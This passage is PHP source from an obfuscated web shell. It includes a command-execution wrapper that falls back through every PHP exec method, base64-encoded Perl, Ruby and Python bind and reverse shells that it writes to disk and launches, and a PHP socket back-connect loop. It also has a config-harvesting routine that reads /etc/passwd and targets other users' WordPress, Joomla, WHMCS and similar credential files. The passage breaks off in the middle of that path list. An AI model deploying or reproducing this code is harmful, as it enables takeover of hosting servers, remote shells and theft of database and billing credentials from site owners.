	return $func[41]($func[84]('%o', $perms), -4) . ' >> ' .$info;
}

function exe($in) {
	global $func;
	$out = '';
	try {
		if ($func[49]('exec')) {
			@$func[23]($in, $out);
			$out = @join("\n", $out);
			return $out;
		} elseif ($func[49]('passthru')) {
			$func[48]();
			@$func[24]($in);
			$out = $func[27]();
			return $out;
		} elseif($func[49]('system')) {
			$func[48]();
			@$func[22]($in);
			$out = $func[27]();
			return $out;
		} elseif ($func[49]('shell_exec')) {
			$out = $func[25]($in);
			return $out;
		} elseif ($func[49]("popen") && $func[49]("pclose")) {
			if ($func[77]($f = @$func[76]($in, "r"))) {
				$out = "";
				while(!@$func[78]($f))
				$out .= $func[79]($f, 1024);
				$func[80]($f);
				return $out;
			}
		} elseif ($func[49]('proc_open')) {
			$pipes = [];
			$process = @$func[81]($in.' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
			$out = @$func[82]($pipes[1]);
			return $out;
		} elseif ($func[83]('COM')) {
			$ws = new COM('WScript.shell');
			$exec = $ws->exec('cmd.exe /c '.$in);
			$stdout = $exec->StdOut();
			$out = $stdout->ReadAll();
			return $out;
		}
	} catch(Exception $e) {}
	return $out;
}

function checkName($name) {
	global $func;
	if ($func[55]($name) > 18) {
		return $func[41]($name, 0, 18) . "...";
	}
	return $name;
}

function checkPerm($dir, $perm) {
	global $func;
	$perm = $func[46]('>>', $perm);
	if ($func[8]($dir)) {
		return "<font class='text-success' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[0]."</font> >> <font class='text-success' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[1]."</font>";
	} elseif (!$func[9]($dir)) {
		return "<font class='text-danger' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[0]."</font> >> <font class='text-danger' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[1]."</font>";
	} else {
		return "<font class='text-secondary' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[0]."</font> >> <font class='text-secondary' data-bs-toggle='modal' data-bs-target='#chmodModal' data-bs-perm='".trim($perm[0])."' data-bs-name='".$dir."'>".$perm[1]."</font>";
	}
}

function getowner($item) {
	global $func;
	if ($func[49]("posix_getpwuid")) {
		$downer = @$func[33]($func[36]($item));
		$downer = $downer['name'];
	} else {
		$downer = $func[36]($item);
	}
	if ($func[49]("posix_getgrgid")) {
		$dgrp = @$func[34]($func[37]($item));
		$dgrp = $dgrp['name'];
	} else {
		$dgrp = $func[37]($item);
	}
	return $downer . '/' . $dgrp;
}

function geticon($file) {
	global $func;
	$ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
	if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
		return 'file-code';
	} else if ($ext == 'pdf') {
		return 'file-pdf';
	} else if ($ext == 'txt') {
		return 'file-alt';
	} else if ($ext == 'csv') {
		return 'file-csv';
	} else if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
		return 'file-image';
	} else if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
		return 'file-video';
	} else if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
		return 'file-word';
	} else if ($ext == 'ppt' || $ext == 'pptx') {
		return 'file-powerpoint';
	} else if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
		return 'file-excel';
	} else if ($ext == 'mp3' || $ext == 'wav') {
		return 'file-audio';
	} else if ($ext == 'sql' || $ext == 'db') {
		return 'database';
	} else if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
		return 'file-archive';
	} else {
		return 'file';
	}
}

function which($p) {
	global $func;
	$path = exe('which ' . $p);
	if (!empty($path)) {
		return $func[55]($path);
	}
	return false;
}

function flash($message, $status, $class, $redirect = false) {
	if (!empty($_SESSION["message"])) {
		unset($_SESSION["message"]);
	}
	if (!empty($_SESSION["class"])) {
		unset($_SESSION["class"]);
	}
	if (!empty($_SESSION["status"])) {
		unset($_SESSION["status"]);
	}
	$_SESSION["message"] = $message;
	$_SESSION["class"] = $class;
	$_SESSION["status"] = $status;
	if ($redirect) {
		$func[75]('Location: ' . $redirect);
		exit();
	}
	return true;
}

function clear() {
	if (!empty($_SESSION["message"])) {
		unset($_SESSION["message"]);
	}
	if (!empty($_SESSION["class"])) {
		unset($_SESSION["class"]);
	}
	if (!empty($_SESSION["status"])) {
		unset($_SESSION["status"]);
	}
	return true;
}

function deleter($d) {
	global $func;
	if ($func[56]($func[35]($d, PATHINFO_BASENAME), '.') === '') {
		return false;
	};
	if ($func[6]($d)) {
		$func[73]("deleter", $func[74]($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		$func[71]($d);
		return true;
	} else {
		$func[72]($d);
		return true;
	}
	return false;
}

function read($file) {
	global $func;
	$array = @$func[44]($file);
	if (!$array) {
		if ($func[60](exe("id")) > 0) {
			$data = exe('cat "'.$func[69]($file).'"');
			if ($func[60]($data) > 0) {
				return $func[46]("\n", $data);
			} else {
				return false;
			}
		} else {
			return false;
		}
	} else {
		return $array;
	}
}

function networkTools($type, $port, $host = null, $with = 'php') {
	global $func;
	if ($type == 1) {
		$bp = $func[88]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
		$brt = @$func[86]('bp.pl', 'w');
		$func[87]($brt, $bp);
		$out = exe("perl bp.pl $port 1>/dev/null 2>&1 &");
		sleep(1);
		$res = "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
		$func[72]("bp.pl");
		return $res;
	} else {
		if ($with == 'ruby') {
			$cont = $func[88]("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
			$bc = $func[86]('bcrb.rb', 'w');
			$func[87]($bc, $cont);
			$out = exe("ruby bcrb.rb $host $port");
			sleep(1);
			$res = "<pre>$out\n" . exe("ps aux | grep bcrb.rb") . "</pre>";
			$func[72]("bcrb.rb");
			return $res;
		} else if ($with == 'python') {
			$cont = $func[88]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
			$bc = $func[86]('bcpy.py', 'w');
			$func[87]($bc, $cont);
			$out = exe("python bcpy.py $host $port");
			sleep(1);
			$res = "<pre>$out\n" . exe("ps aux | grep bcpy.py") . "</pre>";
			$func[72]("bcpy.py");
			return $res;
		} else if ($with == 'perl') {
			$cont = $func[88]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
			$bc = $func[86]('bcpl.pl', 'w');
			$func[87]($bc, $cont);
			$out = exe("perl bcpl.pl $host $port 1>/dev/null 2>&1 &");
			sleep(1);
			$res = "<pre>$out\n" . exe("ps aux | grep bcpl.pl") . "</pre>";
			$func[72]("bcpl.pl");
			return $res;
		} else {
			$sockfd = $func[89]($host, $port, $errno, $errstr);
			if ($errno != 0) {
				return "<pre>$errno : $errstr</pre>";
			} else if (!$sockfd) {
				return "<pre>Unexpected error has occured, connection may have failed.</pre>";
			} else {
				while (!$func[78]($sockfd)) {
					$user = exe('whoami');
					$pwd = exe('pwd');
					@$func[90]($sockfd, "$user@" . (!@$_SERVER["SERVER_ADDR"] ? ($func[49]("gethostbyname") ? @$func[40]($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]) . "~$pwd > ");
					$command = $func[91]($sockfd, 1337);
					@$func[90]($sockfd, "\n" . exe($command) . "\n\n");
				}
				@$func[92]($sockfd);
			}
		}
	}
}

function getConfig() {
	global $func;
	global $dir;
	if ($func[12]("/etc/passwd")) {
		$passwd = $func[14]("/etc/passwd");
		if ($func[12]("infinity_config")) {
			return "<font class='text-danger'>Folder infinity_config already exist! Please delete it first to get configs!</font>";
		} else {
			$func[15]('infinity_config', 0777);
			$htc = $func[86]('infinity_config/.htaccess', 'w');
			$func[87]($htc, "Options all\nRequire None\nSatisfy Any");
			$func[32]('/(.*?):x:/', $passwd, $user_config);
			foreach ($user_config[1] as $user_con) {
				$user_config_dir = "/home/$user_con/public_html/";
				if ($func[9]($user_config_dir)) {
					$grab_config = [
						"/home/$user_con/.my.cnf" => "cpanel",
						"/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
						"/home/$user_con/public_html/forum/config.php" => "phpBB",
						"/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
							"/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
						"/home/$user_con/public_html/app/etc/local.xml" => "Magento",
						"/home/$user_con/public_html/admin/config.php" => "OpenCart",
						"/home/$user_con/public_html/application/config/database.php" => "Ellislab",
						"/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
						"/home/$user_con/public_html/includes/config.php" => "Vbulletin",
						"/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
						"/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
						"/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
						"/home/$user_con/public_html/inc/config.php" => "MyBB",
						"/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
						"/home/$user_con/public_html/inc/conf_global.php" => "IPB",
						"/home/$user_con/public_html/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
						"/home/$user_con/public_html/configuration.php" => "Joomla",
						"/home/$user_con/public_html/blog/configuration.php" => "Joomla",
						"/home/$user_con/public_html/submitticket.php" => "^WHMCS",
						"/home/$user_con/public_html/cms/configuration.php" => "Joomla",
						"/home/$user_con/public_html/beta/configuration.php" => "Joomla",
						"/home/$user_con/public_html/portal/configuration.php" => "Joomla",
						"/home/$user_con/public_html/site/configuration.php" => "Joomla",
						"/home/$user_con/public_html/main/configuration.php" => "Joomla",
						"/home/$user_con/public_html/home/configuration.php" => "Joomla",
						"/home/$user_con/public_html/demo/configuration.php" => "Joomla",
						"/home/$user_con/public_html/test/configuration.php" => "Joomla",
						"/home/$user_con/public_html/v1/configuration.php" => "Joomla",
						"/home/$user_con/public_html/v2/configuration.php" => "Joomla",
						"/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
						"/home/$user_con/public_html/new/configuration.php" => "Joomla",
						"/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BUY/sumitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
